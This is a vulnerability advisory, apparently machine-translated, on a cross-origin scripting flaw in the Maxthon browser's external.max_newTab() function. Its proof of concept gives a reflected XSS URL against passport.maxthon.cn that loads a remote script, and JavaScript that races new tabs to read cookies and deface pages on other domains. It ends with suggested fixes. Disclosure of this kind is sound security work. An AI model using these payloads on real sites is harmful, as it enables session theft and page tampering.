Ao you browser is a multi-tag browser that meets Chinese usage habits. It has the best online favorites and advertisement filtering functions in the industry. Browser explorer has a security defect in architecture design. In addition, it can break through the same-source browser policy in combination with the security issues of its own interface functions, resulting in a cross-origin scripting vulnerability.
A external interface function in the browser does not follow the same-origin policy, and a cross-origin scripting vulnerability exists.
The vulnerability function external. max_newTab () is used to open a new tab. This function has a time competition condition error. It can break through the same-origin policy cross-origin operation window object and execute arbitrary scripts across domains.
At the same time, the external interface function customized by the browser has set a trust domain, which includes * .maxthon.cn and so on. Combined with a Script Vulnerability of * .maxthon.cn any web application, you can call the vulnerability function external. max_newTab () performs cross-origin operations.
POC:
1. A cross-site scripting vulnerability exists in passport.maxthon.cn. The cross-site scripting vulnerability can be used to call the vulnerability function and embed a remote js http: // 127.0.0.1/vul. js
Http://passport.maxthon.cn/new/register_account.html? Account = "> <script/src = http: // 127.0.0.1/vul. js> </script>
2. javascript scripts that call vulnerability Functions
hijack_code = "alert(document.cookie);document.write(hacked by rayh4c#80sec.com)"t1 = external.max_newTab("a",http://www.sina.com/,"activate:yes")t2 = external.max_newTab("b",http://www.baidu.com/,"activate:yes")t3 = external.max_newTab("a",http://www.sohu.com/,"activate:yes")setInterval("t1.eval(hijack_code)",1)setInterval("t2.eval(hijack_code)",2)setInterval("t3.eval(hijack_code)",3)
Hazard results:
The three new tab windows will randomly hit a window and run the cross-domain injection script. For example, Baidu web pages are read by cookies and tampered with webpages.
Solution:
1. Fixed the WEB application vulnerability in * .maxthon.cn domain name.
2. Fixed the vulnerability in the interface function external. max_newTab ().